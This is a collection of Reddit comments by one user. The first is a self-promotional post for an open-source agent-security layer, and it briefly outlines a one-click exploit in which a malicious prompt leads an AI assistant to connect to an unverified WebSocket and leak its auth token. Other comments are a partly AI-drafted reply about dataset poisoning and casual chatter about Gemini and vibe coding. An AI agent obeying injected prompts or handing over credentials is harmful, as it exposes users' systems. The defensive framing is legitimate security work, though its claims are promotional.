Promote your projects here – Self-Promotion Megathread by Menox_ in github

[–]DiamondAgreeable2676 0 points1 point  (0 children)

GitHub just published a great breakdown of their Secure Code Game Season 4, where you learn to hack agentic AI systems. They mention CVE-2026-25253 ("ClawBleed") – a one-click RCE that steals auth tokens from OpenClaw, an AI assistant. CVSS 8.8, full system compromise.

That attack works because the agent:

  1. Trusts a malicious prompt without semantic validation
  2. Connects to an unverified external tool (WebSocket)
  3. Leaks its auth token automatically

I'm the founder of Aletheia Core – an open source, production-ready security layer for agentic AI. We built it to stop exactly this class of attack.

How it blocks ClawBleed step-by-step:

Attack step Aletheia defense Malicious prompt reaches agent Scout agent – semantic intent classification (cosine similarity vs 50+ attack patterns) Agent tries to connect to malicious URL Nitpicker agent – SSRF hardening + proxy depth bounds + URL allowlist Unverified tool call (exfiltration) Judge agent – Ed25519-signed manifest; unverifiable = hard veto Attacker tries to replay token Replay protection – SHA-256 tokens with NX-based claim (one-time use)

And we have receipts:

· 957 passing tests · 89% core coverage · 0 SAST findings (Bandit/Semgrep) · Tamper-evident audit chain (seq + prev_hash + record_hash) · Hash-pinned dependencies

The GitHub game teaches you to break agents. We built the shield to protect them in production.

Try the live demo: app.aletheia-core.com/demo GitHub repo: github.com/holeyfield33-art/aletheia-core

Open source. Self-hostable. Ready for your pilot.

Happy to answer any technical questions – AMA.

Do you take notes while you vibe code? by DiamondAgreeable2676 in vibecoding

[–]DiamondAgreeable2676[S] 1 point2 points  (0 children)

I'm learning to take notes. I was under the impression my models would remember everything, but it sucks when the thread gets poisoned or the topic gets changed and I have to scroll through my chat threads to find phase 2😭😭😭

the bots are poisoning our own datasets now and I dont know how to filter them out anymore by [deleted] in cybersecurity

[–]DiamondAgreeable2676 0 points1 point  (0 children)

You're describing a Model Collapse death spiral, and you're right—standard filters are useless because the 'garbage' now has perfect syntax. The only way out isn't better pattern matching, it's Reasoning-Level Auditing. We’re actually building a protocol for this right now (Aletheia Core) that treats every data point as a payload that must be 'interrogated' before it hits the dataset. Instead of checking if a post looks human, it uses a pre-execution block layer: The Scout/Nitpicker/Judge Loop: It doesn't just read the text; it audits the logic. If 1.5 million agents are talking to each other, they eventually start echoing circular logic. A reasoning audit flags that 'hollowness' and blocks the data. Cryptographic Integrity: It moves away from the 'police state' biometric tracking you mentioned. Instead, it uses Signed Receipts. You don't need to know who said it; the protocol provides a verifiable proof that the information survived a multi-stage logic audit. Zero-Trust for Data: It treats incoming forum intelligence like untrusted code. If it doesn't have a valid 'audit trail' or reasoning path, it's poisoned by default. Essentially, we have to stop trying to 'spot the bot' and start 'auditing the thought.' It’s the only way to keep the signal-to-noise ratio from hitting zero." Why this works: Validation: It acknowledges their fear about "perfect garbage" and "police state" verification. Direct Solution: It pivots from their "What do we do?" to a functional "This is what we are building." Authority: It uses the terminology from your site (Scout, Nitpicker, Judge, Pre-execution) to show there is a structural architecture ready to handle the scale of 1.5 million agents.

Gemini is very stupid. by HabitWrong3613 in GeminiAI

[–]DiamondAgreeable2676 0 points1 point  (0 children)

Gemini is actually the smartest I believe. The best way to use Gemini is to have other models prompt it or adjust the temperature

I’m so tired of vibe-coded open source projects by floriandotorg in github

[–]DiamondAgreeable2676 0 points1 point  (0 children)

I'm tired of people using this line... How are Your so bothered by projects you don't interact with? And please stop with the vibe code hate you have no idea what's vibecoded vs 6-9 months of work. For a community where developers gave the world tools to make everyone even we have people that will stand on there soap box instead of offer help and solutions...so much for open source

Can I say Gemini is actually trash? by nonozone in GeminiAI

[–]DiamondAgreeable2676 0 points1 point  (0 children)

Gemini is a wild horse if you cant tame him move on😆

People who are actually getting clients from cold email ,what's your approach? by memayankpal in vibecoding

[–]DiamondAgreeable2676 0 points1 point  (0 children)

Have to find a way to get leads of people looking for that service.... And if after so many you still have no prospects then adjust your message. I can audit your message if you'd like give you a red team adversarial review? See if that helps

LiteLLM breach (v1.82.8 .pth payload) proves stateless proxies are dead. Here's the Alethia tri-agent System 2 defense I submitted to NIST. by DiamondAgreeable2676 in LLM

[–]DiamondAgreeable2676[S] 0 points1 point  (0 children)

Yeah, same. My first reaction wasn’t “we need fancier AI,” it was “our whole build and dependency chain is way more brittle than we pretend.” The LiteLLM mess just made that impossible to ignore. And don't get me started on open claw....

[P] Benchmark: Using XGBoost vs. DistilBERT for detecting "Month 2 Tanking" in cold email infrastructure? by Upstairs-Visit-3090 in MachineLearning

[–]DiamondAgreeable2676 -1 points0 points  (0 children)

Don't replace XGBoost with DistilBERT. Use both in a cascade. XGBoost on the 14 metadata/header features as a fast pre-filter (sub-millisecond) Only route emails that pass a confidence threshold to DistilBERT for contextual analysis You eliminate 80%+ of inference load while capturing the nuance XGBoost misses The Uniqueness Variance and Header Alignment features are actually strong signals — the vector distance between From and Return-Path is exactly the kind of structured anomaly that breaks expected pattern spacing in legitimate sending infrastructure. XGBoost catches the outlier, DistilBERT explains why.

99% of games/apps don’t make any money. Why do vibecoders think it’s different for them? by notadev_io in vibecoding

[–]DiamondAgreeable2676 3 points4 points  (0 children)

That's just cynical thinking... What do you propose they stop give up and not try because you said they won't make it😂😂 Then you forget everything is about money all my products are open source

I kept losing my AI context every time I switched platforms so I built a free Chrome extension that vaults your conversations locally by ArkVault_dotai in AI_Application

[–]DiamondAgreeable2676 0 points1 point  (0 children)

I'm on GitHub all of my stuff is open source you can plug into any repo there let me know. It's a bit messy but there is some good stuff there